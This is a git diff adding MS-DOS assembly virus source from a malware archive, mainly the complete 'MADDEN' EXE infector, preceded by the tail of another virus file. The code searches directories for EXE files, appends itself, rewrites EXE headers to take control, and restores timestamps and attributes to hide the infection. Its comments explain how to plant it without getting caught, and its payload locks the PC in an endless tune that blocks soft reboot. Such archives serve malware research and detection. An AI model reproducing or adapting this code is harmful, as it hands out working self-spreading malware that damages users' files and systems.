+; +TIMECT EQU 0 ;Determines how often to reproduce (1/64 here) +; +SHOULDRUN: + xor ah,ah ;zero ax to start, set z flag +SR1: ret ;this gets replaced by NOP when program runs + int 1AH + and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks? + ret ;return with z flag set if it is, else nz set + + +;-------------------------------------------------------------------------- +;SETSR modifies SHOULDRUN so that the full procedure gets run +;it is redundant after the initial load +SETSR: + mov al,90H ;NOP code + mov BYTE PTR SR1,al ;put it in place of RET above + ret ;and return + +;-------------------------------------------------------------------------- +;This routine sets up the new DTA location at DTA1, and saves the location of +;the initial DTA in the variable OLDDTA. +NEW_DTA: + mov ah,2FH ;get current DTA in ES:BX + int 21H + mov WORD PTR [OLDDTA],bx ;save it here + mov ax,es + mov WORD PTR [OLDDTA+2],ax + mov ax,cs + mov es,ax ;set up ES + mov dx,OFFSET DTA1 ;set new DTA offset + mov ah,1AH + int 21H ;and tell DOS where we want it + ret + +;-------------------------------------------------------------------------- +;This routine reverses the action of NEW_DTA and restores the DTA to its +;original value. +RESTORE_DTA: + mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs + mov ax,WORD PTR [OLDDTA+2] + mov ds,ax + mov ah,1AH + int 21H ;and tell DOS where to put it + mov ax,cs ;restore ds before exiting + mov ds,ax + ret + +;-------------------------------------------------------------------------- +;This routine saves the original file attribute in FATTR, the file date and +;time in FDATE and FTIME, and the file size in FSIZE. It also sets the +;file attribute to read/write, and leaves the file opened in read/write +;mode (since it has to open the file to get the date and size), with the handle +;it was opened under in HANDLE. The file path and name is in USEFILE. 
+SAVE_ATTRIBUTE: + mov ah,43H ;get file attr + mov al,0 + mov dx,OFFSET USEFILE + int 21H + mov [FATTR],cl ;save it here + mov ah,43H ;now set file attr to r/w + mov al,1 + mov dx,OFFSET USEFILE + mov cl,0 + int 21H + mov dx,OFFSET USEFILE + mov al,2 ;now that we know it's r/w + mov ah,3DH ;we can r/w access open file + int 21H + mov [HANDLE],ax ;save file handle here + mov ah,57H ;and get the file date and time + xor al,al + mov bx,[HANDLE] + int 21H + mov [FTIME],cx ;and save it here + mov [FDATE],dx ;and here + mov ax,WORD PTR [DTA1+28] ;file size was set up here by + mov WORD PTR [FSIZE+2],ax ;search routine + mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE + mov WORD PTR [FSIZE],ax + ret + +;-------------------------------------------------------------------------- +;Restore file attribute, and date and time of the file as they were before +;it was infected. This also closes the file +REST_ATTRIBUTE: + mov dx,[FDATE] ;get old date and time + mov cx,[FTIME] + mov ah,57H ;set file date and time to old value + mov al,1 + mov bx,[HANDLE] + int 21H + mov ah,3EH + mov bx,[HANDLE] ;close file + int 21H + mov cl,[FATTR] + xor ch,ch + mov ah,43H ;Set file attr to old value + mov al,1 + mov dx,OFFSET USEFILE + int 21H + ret + +FINAL: ;last byte of code to be kept in virus + +VSEG ENDS + + +;-------------------------------------------------------------------------- +;Virus stack segment + +VSTACK SEGMENT PARA STACK + db STACKSIZE dup (?) +VSTACK ENDS + + END VIRUS ;Entry point is the virus diff --git a/MSDOS/Virus.MSDOS.Unknown.intr1988.asm b/MSDOS/Virus.MSDOS.Unknown.intr1988.asm new file mode 100644 index 00000000..8036909d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intr1988.asm 
@@ -0,0 +1,805 @@ +;The MADDEN virus is an EXE file infector which can jump from directory to +;directory. It attaches itself to the end of a file and +;modifies the EXE file header so that it gets control first, before the host +;program. When it is done doing its job, it passes control to the host program, +;so that the host executes without a hint that the virus is there. + + + .SEQ ;segments must appear in sequential order + ;to simulate conditions in actual active virus + + +;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together + +;HOSTSEG program code segment. The virus gains control before this routine and +;attaches itself to another EXE file. As such, the host program for this +;installer simply tries to delete itself off of disk and terminates. That is +;worthwhile if you want to infect a system with the virus without getting +;caught. Just execute the program that infects, and it disappears without a +;trace. You might want to name the program something more innocuous, though. +;MADDEN also locks the pc into a 'maddening' toon when it runs out +;of files to infect. (MADDEN can be assembled to an .obj file under a86, +;then linked to the 'infected' .exe form.) + +HOSTSEG SEGMENT BYTE + ASSUME CS:HOSTSEG,SS:HSTACK + +PGMSTR DB 'MADDEN.EXE',0 + +HOST: + mov ax,cs ;we want DS=CS here + mov ds,ax + mov dx,OFFSET PGMSTR + mov ah,41H + int 21H ;delete this exe file + mov ah,4CH + mov al,0 + int 21H ;terminate normally +HOSTSEG ENDS + + +;Host program stack segment + +HSTACK SEGMENT PARA STACK + db 100H dup (?) ;100 bytes long +HSTACK ENDS + +;------------------------------------------------------------------------ +;This is the virus itself + +STACKSIZE EQU 100H ;size of stack for the virus +NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table + +;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together + +;MADDEN Virus code segment. This gains control first, before the host. 
As this +;ASM file is layed out, this program will look exactly like a simple program +;that was infected by the virus. + +VSEG SEGMENT PARA + ASSUME CS:VSEG,DS:VSEG,SS:VSTACK + +;data storage area comes before any code +VIRUSID DW 0C8AAH ;identifies virus +OLDDTA DD 0 ;old DTA segment and offset +DTA1 DB 2BH dup (?) ;new disk transfer area +DTA2 DB 56H dup (?) ;dta for directory finds (2 deep) +EXE_HDR DB 1CH dup (?) ;buffer for EXE file header +EXEFILE DB '\*.EXE',0 ;search string for an exe file +ALLFILE DB '\*.*',0 ;search string for any file +USEFILE DB 78 dup (?) ;area to put valid file path +LEVEL DB 0 ;depth to search directories for a file +HANDLE DW 0 ;file handle +FATTR DB 0 ;old file attribute storage area +FTIME DW 0 ;old file time stamp storage area +FDATE DW 0 ;old file date stamp storage area +FSIZE DD 0 ;file size storage area +VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there +VCODE DB 1 ;identifies this version +MUZIK dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 
6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + dw 3043,0006, 3619,0006, 4831,0006, 6087,0006 + dw 3043,0010, + + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, + dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, + dw 3043,0006, 5119,0006, 5423,0006, 3043,0006, + dw 6087,0020, + + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + dw 3043,0006, 3619,0006, 4831,0006, 6087,0006 + dw 3043,0010, + + dw 6087,0006, + dw 7239,0006, 3619,0006, 4831,0006, 6087,0006 + dw 7670,0006, 7239,0006, 4831,0006, 3619,0006 + + dw 6087,0006, 4063,0006, 3043,0006, 5119,0006 + dw 4831,0006, 6087,0006, 7239,0006, 8126,0006 + dw 6087,0020, + + dw 0ffffh +;-------------------------------------------------------------------------- +;MADDEN virus main routine starts here +VIRUS: + push ax ;save startup info in ax + mov ax,cs + mov ds,ax ;set up DS=CS for the virus + mov ax,es ;get PSP Seg + mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it + call SHOULDRUN ;run only when certain conditions met signalled by z set + jnz REL1 ;conditions aren't met, go execute host program + call SETSR ;modify SHOULDRUN procedure to activate conditions + call NEW_DTA ;set up a new DTA location + call FIND_FILE ;get an exe file to attack + jnz TOON ;returned nz - no valid files left, play maddening toon! 
+ call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode + call INFECT ;move program code to file we found to attack + call REST_ATTRIBUTE ;restore the original file attributes and close the file +FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup + pop ax ;restore startup value of ax +REL1: ;relocatable marker for host stack segment + mov bx,HSTACK ;set up host program stack segment (ax=segment) + cli ;interrupts off while changing stack + mov ss,bx +REL1A: ;marker for host stack pointer + mov sp,OFFSET HSTACK + mov es,WORD PTR [OLDDTA+2] ;set up ES correctly + mov ds,WORD PTR [OLDDTA+2] ;and DS + sti ;interrupts back on +REL2: ;relocatable marker for host code segment + jmp FAR PTR HOST ;begin execution of host program + +;-------------------------------------------------------------------------- +;First Level - Find a file which passes FILE_OK +; +;This routine does a complex directory search to find an EXE file in the +;current directory, one of its subdirectories, or the root directory or one +;of its subdirectories, to find a file for which FILE_OK returns with C reset. +;If you want to change the depth of the search, make sure to allocate enough +;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work, +;since the recursive FINDBR uses a different DTA area for the search (see DOS +;functions 4EH and 4FH) on each level. +; +FIND_FILE: + mov al,'\' ;set up current directory path in USEFILE + mov BYTE PTR [USEFILE],al + mov si,OFFSET USEFILE+1 + xor dl,dl + mov ah,47H + int 21H ;get current dir, USEFILE= \dir + cmp BYTE PTR [USEFILE+1],0 ;see if it is null. 
If so, its the root + jnz FF2 ;not the root + xor al,al ;make correction for root directory, + mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' +FF2: mov al,2 + mov [LEVEL],al ;search 2 subdirs deep + call FINDBR ;attempt to locate a valid file + jz FF3 ;found one - exit + xor al,al ;nope - try the root directory + mov BYTE PTR [USEFILE],al ;by setting USEFILE= '' + inc al ;al=1 + mov [LEVEL],al ;search one subdir deep + call FINDBR ;attempt to find file +FF3: + ret ;exit with z flag set by FINDBR to indicate success/failure + +;*************************************************************************** +; This routine enables MADDEN virus to compell the pc to play a +;'maddening' toon when it can't find a file to infect +;************************************************************************** +TOON: + cli ;interrupts off + mov al,10110110xb ;the magic number + out 43h,al ;send it + lea si,MUZIK ;point (si) to our note table +TOON2: cld ;must increment forward + lodsw ;load word into ax and increment (si) + cmp ax,0ffffh ;is it ffff - if so end of table + jz GO_MUZIK2 ;so, time to jump into endless loop + out 42h,al ;send LSB first + mov al,ah ;place MSB in al + out 42h,al ;send it next + in al,61h ;get value to turn on speaker + or al,00000011xb ;OR the gotten value + out 61h,al ;now we turn on speaker + lodsw ;load the repeat loop count into (ax) +LOOP6: mov cx,8000 ;delay count +LOOP7: loop LOOP7 ;do the delay + dec ax ;decrement repeat count + jnz loop6 ;if not = 0 loop back + in al,61h ;all done + and al,11111100xb ;number turns speaker off + out 61h,al ;send it + jmp short TOON2 ;now go do next note +GO_MUZIK2: ;our loop point + sti ;enable interrupts + jmp TOON ;jump back to beginning - this code + ; has the additional advantage of + ;locking out CTRL-ALT-DEL reboot. + ;The user must do a hard reset to recover. 
+;-------------------------------------------------------------------------- +;SEARCH FUNCTION +;--------------------------------------------------------------------------- +;Second Level - Find in a branch +; +;This function searches the directory specified in USEFILE for EXE files. +;after searching the specified directory, it searches subdirectories to the +;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this +;routine exits with Z set and leaves the file and path in USEFILE +; +FINDBR: + call FINDEXE ;search current dir for EXE first + jnc FBE3 ;found it - exit + cmp [LEVEL],0 ;no - do we want to go another directory deeper? + jz FBE1 ;no - exit + dec [LEVEL] ;yes - decrement LEVEL and continue + mov di,OFFSET USEFILE ;'\curr_dir' is here + mov si,OFFSET ALLFILE ;'\*.*' is here + call CONCAT ;get '\curr_dir\*.*' in USEFILE + inc di + push di ;store pointer to first * + call FIRSTDIR ;get first subdirectory + jnz FBE ;couldn't find it, so quit +FB1: ;otherwise, check it out + pop di ;strip \*.* off of USEFILE + xor al,al + stosb + mov di,OFFSET USEFILE + mov bx,OFFSET DTA2+1EH + mov al,[LEVEL] + mov dl,2BH ;compute correct DTA location for subdir name + mul dl ;which depends on the depth we're at in the search + add bx,ax ;bx points to directory name + mov si,bx + call CONCAT ;'\curr_dir\sub_dir' put in USEFILE + push di ;save position of first letter in sub_dir name + call FINDBR ;scan the subdirectory and its subdirectories (recursive) + jz FBE2 ;if successful, exit + call NEXTDIR ;get next subdirectory in this directory + jz FB1 ;go check it if search successful +FBE: ;else exit, NZ set, cleaned up + inc [LEVEL] ;increment the level counter before exit + pop di ;strip any path or file spec off of original + xor al,al ;directory path + stosb +FBE1: mov al,1 ;return with NZ set + or al,al + ret + +FBE2: pop di ;successful exit, pull this off the stack +FBE3: xor al,al ;and set Z + ret ;exit + 
+;-------------------------------------------------------------------------- +;Third Level - Part A - Find an EXE file +; +;This function searches the path in USEFILE for an EXE file which passes +;the test FILE_OK. This routine will return the full path of the EXE file +;in USEFILE, and the c flag reset, if it is successful. Otherwise, it will return +;with the c flag set. It will search a whole directory before giving up. +; +FINDEXE: + mov dx,OFFSET DTA1 ;set new DTA for EXE search + mov ah,1AH + int 21H + mov di,OFFSET USEFILE + mov si,OFFSET EXEFILE + call CONCAT ;set up USEFILE with '\dir\*.EXE' + push di ;save position of '\' before '*.EXE' + mov dx,OFFSET USEFILE + mov cx,3FH ;search first for any file + mov ah,4EH + int 21H +NEXTEXE: + or al,al ;is DOS return OK? + jnz FEC ;no - quit with C set + pop di + inc di + stosb ;truncate '\dir\*.EXE' to '\dir\' + mov di,OFFSET USEFILE + mov si,OFFSET DTA1+1EH + call CONCAT ;setup file name '\dir\filename.exe' + dec di + push di + call FILE_OK ;yes - is this a good file to use? + jnc FENC ;yes - valid file found - exit with c reset + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTEXE ;and go test it for validity + +FEC: ;no valid file found, return with C set + pop di + mov BYTE PTR [di],0 ;truncate \dir\filename.exe to \dir + stc + ret +FENC: ;valid file found, return with NC + pop di + ret + + +;-------------------------------------------------------------------------- +;Third Level - Part B - Find a subdirectory +; +;This function searches the file path in USEFILE for subdirectories, excluding +;the subdirectory header entries. If one is found, it returns with Z set, and +;if not, it returns with NZ set. +;There are two entry points here, FIRSTDIR, which does the search first, and +;NEXTDIR, which does the search next. 
+; +FIRSTDIR: + call GET_DTA ;get proper DTA address in dx (calculated from LEVEL) + push dx ;save it + mov ah,1AH ;set DTA + int 21H + mov dx,OFFSET USEFILE + mov cx,10H ;search for a directory + mov ah,4EH ;do search first function + int 21H +NEXTD1: + pop bx ;get pointer to search table (DTA) + or al,al ;successful search? + jnz NEXTD3 ;no, quit with NZ set + test BYTE PTR [bx+15H],10H ;is this a directory? + jz NEXTDIR ;no, find another + cmp BYTE PTR [bx+1EH],'.' ;is it a subdirectory header? + jne NEXTD2 ;no - valid directory, exit, setting Z flag + ;else it was dir header entry, so fall through to next +NEXTDIR: ;second entry point for search next + call GET_DTA ;get proper DTA address again - may not be set up + push dx + mov ah,1AH ;set DTA + int 21H + mov ah,4FH + int 21H ;do find next + jmp SHORT NEXTD1 ;and loop to check the validity of the return + +NEXTD2: + xor al,al ;successful exit, set Z flag +NEXTD3: + ret ;exit routine + +;-------------------------------------------------------------------------- +;Return the DTA address associated to LEVEL in dx. This is simply given by +;OFFSET DTA2 + (LEVEL*2BH). Each level must have a different search record +;in its own DTA, since a search at a lower level occurs in the middle of the +;higher level search, and we don't want the higher level being ruined by +;corrupted data. +; +GET_DTA: + mov dx,OFFSET DTA2 + mov al,2BH + mul [LEVEL] + add dx,ax ;return with dx= proper dta offset + ret + +;-------------------------------------------------------------------------- +;Concatenate two strings: Add the asciiz string at DS:SI to the asciiz +;string at ES:DI. Return ES:DI pointing to the end of the first string in the +;destination (or the first character of the second string, after moved). 
+; +CONCAT: + mov al,byte ptr es:[di] ;find the end of string 1 + inc di + or al,al + jnz CONCAT + dec di ;di points to the null at the end + push di ;save it to return to the caller +CONCAT2: + cld + lodsb ;move second string to end of first + stosb + or al,al + jnz CONCAT2 + pop di ;and restore di to point to end of string 1 + ret + + +;-------------------------------------------------------------------------- +;Function to determine whether the EXE file specified in USEFILE is useable. +;if so return nc, else return c +;What makes an EXE file useable?: +; a) The signature field in the EXE header must be 'MZ'. (These +; are the first two bytes in the file.) +; b) The Overlay Number field in the EXE header must be zero. +; c) There must be room in the relocatable table for NUMRELS +; more relocatables without enlarging it. +; d) The word VIRUSID must not appear in the 2 bytes just before +; the initial CS:0000 of the test file. If it does, the virus +; is probably already in that file, so we skip it. +; +FILE_OK: + call GET_EXE_HEADER ;read the EXE header in USEFILE into EXE_HDR + jc OK_END ;error in reading the file, so quit + call CHECK_SIG_OVERLAY ;is the overlay number zero? + jc OK_END ;no - exit with c set + call REL_ROOM ;is there room in the relocatable table? + jc OK_END ;no - exit + call IS_ID_THERE ;is id at CS:0000? +OK_END: ret ;return with c flag set properly + +;-------------------------------------------------------------------------- +;Returns c if signature in the EXE header is anything but 'MZ' or the overlay +;number is anything but zero. 
+CHECK_SIG_OVERLAY: + mov al,'M' ;check the signature first + mov ah,'Z' + cmp ax,WORD PTR [EXE_HDR] + jz CSO_1 ;jump if OK + stc ;else set carry and exit + ret +CSO_1: xor ax,ax + sub ax,WORD PTR [EXE_HDR+26];subtract the overlay number from 0 + ret ;c is set if it's anything but 0 + +;-------------------------------------------------------------------------- +;This function reads the 28 byte EXE file header for the file named in USEFILE. +;It puts the header in EXE_HDR, and returns c set if unsuccessful. +; +GET_EXE_HEADER: + mov dx,OFFSET USEFILE + mov ax,3D02H ;r/w access open file + int 21H + jc RE_RET ;error opening - C set - quit without closing + mov [HANDLE],ax ;else save file handle + mov bx,ax ;handle to bx + mov cx,1CH ;read 28 byte EXE file header + mov dx,OFFSET EXE_HDR ;into this buffer + mov ah,3FH + int 21H +RE_RET: ret ;return with c set properly + +;-------------------------------------------------------------------------- +;This function determines if there are at least NUMRELS openings in the +;current relocatable table in USEFILE. If there are, it returns with +;carry reset, otherwise it returns with carry set. The computation +;this routine does is to compare whether +; ((Header Size * 4) + Number of Relocatables) * 4 - Start of Rel Table +;is >= than 4 * NUMRELS. If it is, then there is enough room +; +REL_ROOM: + mov ax,WORD PTR [EXE_HDR+8] ;size of header, paragraphs + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+6] ;number of relocatables + add ax,ax + add ax,ax + sub ax,WORD PTR [EXE_HDR+24] ;start of relocatable table + cmp ax,4*NUMRELS ;enough room to put relocatables in? +RR_RET: ret ;exit with carry set properly + + +;-------------------------------------------------------------------------- +;This function determines whether the word at the initial CS:0000 in USEFILE +;is the same as VIRUSID in this program. If it is, it returns c set, otherwise +;it returns c reset. 
+; +IS_ID_THERE: + mov ax,WORD PTR [EXE_HDR+22] ;Initial CS + add ax,WORD PTR [EXE_HDR+8] ;Header size + mov dx,16 + mul dx + mov cx,dx + mov dx,ax ;cxdx = position to look for VIRUSID in file + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H + mov ah,3FH + mov bx,[HANDLE] + mov dx,OFFSET VIDC + mov cx,2 ;read 2 bytes into VIDC + int 21H + jc II_RET ;couldn't read - bad file - report as though ID is there so we dont do any more to this file + mov ax,[VIDC] + cmp ax,[VIRUSID] ;is it the VIRUSID? + clc + jnz II_RET ;if not, then virus is not already in this file + stc ;else it is probably there already +II_RET: ret + + +;-------------------------------------------------------------------------- +;This routine makes sure file end is at paragraph boundary, so the virus +;can be attached with a valid CS. Assumes file pointer is at end of file. +SETBDY: + mov al,BYTE PTR [FSIZE] + and al,0FH ;see if we have a paragraph boundary (header is always even # of paragraphs) + jz SB_E ;all set - exit + mov cx,10H ;no - write any old bytes to even it up + sub cl,al ;number of bytes to write in cx + mov dx,OFFSET FINAL ;set buffer up to point to end of the code (just garbage there) + add WORD PTR [FSIZE],cx ;update FSIZE + adc WORD PTR [FSIZE+2],0 + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H +SB_E: ret + +;-------------------------------------------------------------------------- +;This routine moves the virus (this program) to the end of the EXE file +;Basically, it just copies everything here to there, and then goes and +;adjusts the EXE file header and two relocatables in the program, so that +;it will work in the new environment. It also makes sure the virus starts +;on a paragraph boundary, and adds how many bytes are necessary to do that. 
+; +INFECT: + mov cx,WORD PTR [FSIZE+2] + mov dx,WORD PTR [FSIZE] + mov bx,[HANDLE] + mov ax,4200H ;set file pointer, relative to beginning + int 21H ;go to end of file + call SETBDY ;lengthen to a paragraph boundary if necessary + mov cx,OFFSET FINAL ;last byte of code + xor dx,dx ;first byte of code, DS:DX + mov bx,[HANDLE] ;move virus code to end of file being attacked with + mov ah,40H ;DOS write function + int 21H + mov dx,WORD PTR [FSIZE] ;find 1st relocatable in code (SS) + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1 ;it is at FSIZE+REL1+1 in the file + inc bx + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx is that number + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to 1st relocatable + int 21H + mov dx,OFFSET EXE_HDR+14 ;get correct old SS for new program + mov bx,[HANDLE] ;from the EXE header + mov cx,2 + mov ah,40H ;and write it to relocatable REL1+1 + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL1A ;put in correct old SP from EXE header + inc bx ;at FSIZE+REL1A+1 + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL1A+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to place to write SP to + int 21H + mov dx,OFFSET EXE_HDR+16 ;get correct old SP for infected program + mov bx,[HANDLE] ;from EXE header + mov cx,2 + mov ah,40H ;and write it where it belongs + int 21H + mov dx,WORD PTR [FSIZE] + mov cx,WORD PTR [FSIZE+2] + mov bx,OFFSET REL2 ;put in correct old CS:IP in program + add bx,1 ;at FSIZE+REL2+1 on disk + add dx,bx + mov bx,0 + adc cx,bx ;cx:dx points to FSIZE+REL2+1 + mov bx,[HANDLE] + mov ax,4200H ;set file pointer relavtive to start of file + int 21H + mov dx,OFFSET EXE_HDR+20 ;get correct old CS:IP from EXE header + mov bx,[HANDLE] + mov cx,4 + mov ah,40H ;and write 4 bytes to FSIZE+REL2+1 + int 21H + ;done writing relocatable vectors + ;so now adjust the EXE header values + xor cx,cx + xor dx,dx + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to start of file + int 21H + mov ax,WORD PTR 
[FSIZE] ;calculate new initial CS (the virus' CS) + mov cl,4 ;given by (FSIZE/16)-HEADER SIZE (in paragraphs) + shr ax,cl + mov bx,WORD PTR [FSIZE+2] + and bl,0FH + mov cl,4 + shl bl,cl + add ah,bl + sub ax,WORD PTR [EXE_HDR+8] ;(exe header size, in paragraphs) + mov WORD PTR [EXE_HDR+22],ax;and save as initial CS + mov bx,OFFSET FINAL ;compute new initial SS + add bx,10H ;using the formula SSi=(CSi + (OFFSET FINAL+16)/16) + mov cl,4 + shr bx,cl + add ax,bx + mov WORD PTR [EXE_HDR+14],ax ;and save it + mov ax,OFFSET VIRUS ;get initial IP + mov WORD PTR [EXE_HDR+20],ax ;and save it + mov ax,STACKSIZE ;get initial SP + mov WORD PTR [EXE_HDR+16],ax ;and save it + mov dx,WORD PTR [FSIZE+2] + mov ax,WORD PTR [FSIZE] ;calculate new file size + mov bx,OFFSET FINAL + add ax,bx + xor bx,bx + adc dx,bx ;put it in ax:dx + add ax,200H ;and set up the new page count + adc dx,bx ;page ct= (ax:dx+512)/512 + push ax + mov cl,9 + shr ax,cl + mov cl,7 + shl dx,cl + add ax,dx + mov WORD PTR [EXE_HDR+4],ax ;and save it here + pop ax + and ax,1FFH ;now calculate last page size + mov WORD PTR [EXE_HDR+2],ax ;and put it here + mov ax,NUMRELS ;adjust relocatables counter + add WORD PTR [EXE_HDR+6],ax + mov cx,1CH ;and save data at start of file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + mov ax,WORD PTR [EXE_HDR+6] ;get number of relocatables in table + dec ax ;in order to calculate location of + dec ax ;where to add relocatables + mov bx,4 ;Location= (No in table-2)*4+Table Offset + mul bx + add ax,WORD PTR [EXE_HDR+24];table offset + mov bx,0 + adc dx,bx ;dx:ax=end of old table in file + mov cx,dx + mov dx,ax + mov bx,[HANDLE] + mov ax,4200H ;set file pointer to table end + int 21H + mov ax,WORD PTR [EXE_HDR+22] ;and set up 2 pointers: init CS = seg of REL1 + mov bx,OFFSET REL1 + inc bx ;offset of REL1 + mov WORD PTR [EXE_HDR],bx ;use EXE_HDR as a buffer to + mov WORD PTR [EXE_HDR+2],ax ;save relocatables in for now + mov ax,WORD PTR 
[EXE_HDR+22] ;init CS = seg of REL2 + mov bx,OFFSET REL2 + add bx,3 ;offset of REL2 + mov WORD PTR [EXE_HDR+4],bx ;write it to buffer + mov WORD PTR [EXE_HDR+6],ax + mov cx,8 ;and then write 8 bytes of data in file + mov dx,OFFSET EXE_HDR + mov bx,[HANDLE] + mov ah,40H ;DOS write function + int 21H + ret ;that's it, infection is complete! + +;-------------------------------------------------------------------------- +;This routine determines whether the reproduction code should be executed. +;If it returns Z, the reproduction code is executed, otherwise it is not. +;Currently, it only executes if the system time variable is a multiple of +;TIMECT. As such, the virus will reproduce only 1 out of every TIMECT+1 +;executions of the program. TIMECT should be 2^n-1 +;Note that the ret at SR1 is replaced by a NOP by SETSR whenever the program +;is run. This makes SHOULDRUN return Z for sure the first time, so it +;definitely runs when this loader program is run, but after that, the time must +;be an even multiple of TIMECT+1. +; +TIMECT EQU 0 ;Determines how often to reproduce (1/64 here) +; +SHOULDRUN: + xor ah,ah ;zero ax to start, set z flag +SR1: ret ;this gets replaced by NOP when program runs + int 1AH + and dl,TIMECT ;is it an even multiple of TIMECT+1 ticks? + ret ;return with z flag set if it is, else nz set + + +;-------------------------------------------------------------------------- +;SETSR modifies SHOULDRUN so that the full procedure gets run +;it is redundant after the initial load +SETSR: + mov al,90H ;NOP code + mov BYTE PTR SR1,al ;put it in place of RET above + ret ;and return + +;-------------------------------------------------------------------------- +;This routine sets up the new DTA location at DTA1, and saves the location of +;the initial DTA in the variable OLDDTA. 
+NEW_DTA: + mov ah,2FH ;get current DTA in ES:BX + int 21H + mov WORD PTR [OLDDTA],bx ;save it here + mov ax,es + mov WORD PTR [OLDDTA+2],ax + mov ax,cs + mov es,ax ;set up ES + mov dx,OFFSET DTA1 ;set new DTA offset + mov ah,1AH + int 21H ;and tell DOS where we want it + ret + +;-------------------------------------------------------------------------- +;This routine reverses the action of NEW_DTA and restores the DTA to its +;original value. +RESTORE_DTA: + mov dx,WORD PTR [OLDDTA] ;get original DTA seg:ofs + mov ax,WORD PTR [OLDDTA+2] + mov ds,ax + mov ah,1AH + int 21H ;and tell DOS where to put it + mov ax,cs ;restore ds before exiting + mov ds,ax + ret + +;-------------------------------------------------------------------------- +;This routine saves the original file attribute in FATTR, the file date and +;time in FDATE and FTIME, and the file size in FSIZE. It also sets the +;file attribute to read/write, and leaves the file opened in read/write +;mode (since it has to open the file to get the date and size), with the handle +;it was opened under in HANDLE. The file path and name is in USEFILE. +SAVE_ATTRIBUTE: + mov ah,43H ;get file attr + mov al,0 + mov dx,OFFSET USEFILE + int 21H + mov [FATTR],cl ;save it here + mov ah,43H ;now set file attr to r/w + mov al,1 + mov dx,OFFSET USEFILE + mov cl,0 + int 21H + mov dx,OFFSET USEFILE + mov al,2 ;now that we know it's r/w + mov ah,3DH ;we can r/w access open file + int 21H + mov [HANDLE],ax ;save file handle here + mov ah,57H ;and get the file date and time + xor al,al + mov bx,[HANDLE] + int 21H + mov [FTIME],cx ;and save it here + mov [FDATE],dx ;and here + mov ax,WORD PTR [DTA1+28] ;file size was set up here by + mov WORD PTR [FSIZE+2],ax ;search routine + mov ax,WORD PTR [DTA1+26] ;so move it to FSIZE + mov WORD PTR [FSIZE],ax + ret + +;-------------------------------------------------------------------------- +;Restore file attribute, and date and time of the file as they were before +;it was infected. 
This also closes the file +REST_ATTRIBUTE: + mov dx,[FDATE] ;get old date and time + mov cx,[FTIME] + mov ah,57H ;set file date and time to old value + mov al,1 + mov bx,[HANDLE] + int 21H + mov ah,3EH + mov bx,[HANDLE] ;close file + int 21H + mov cl,[FATTR] + xor ch,ch + mov ah,43H ;Set file attr to old value + mov al,1 + mov dx,OFFSET USEFILE + int 21H + ret + +FINAL: ;last byte of code to be kept in virus + +VSEG ENDS + + +;-------------------------------------------------------------------------- +;Virus stack segment + +VSTACK SEGMENT PARA STACK + db STACKSIZE dup (?) +VSTACK ENDS + + END VIRUS ;Entry point is the virus diff --git a/MSDOS/Virus.MSDOS.Unknown.intruder.asm b/MSDOS/Virus.MSDOS.Unknown.intruder.asm new file mode 100644 index 00000000..1195a0cf --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.intruder.asm 
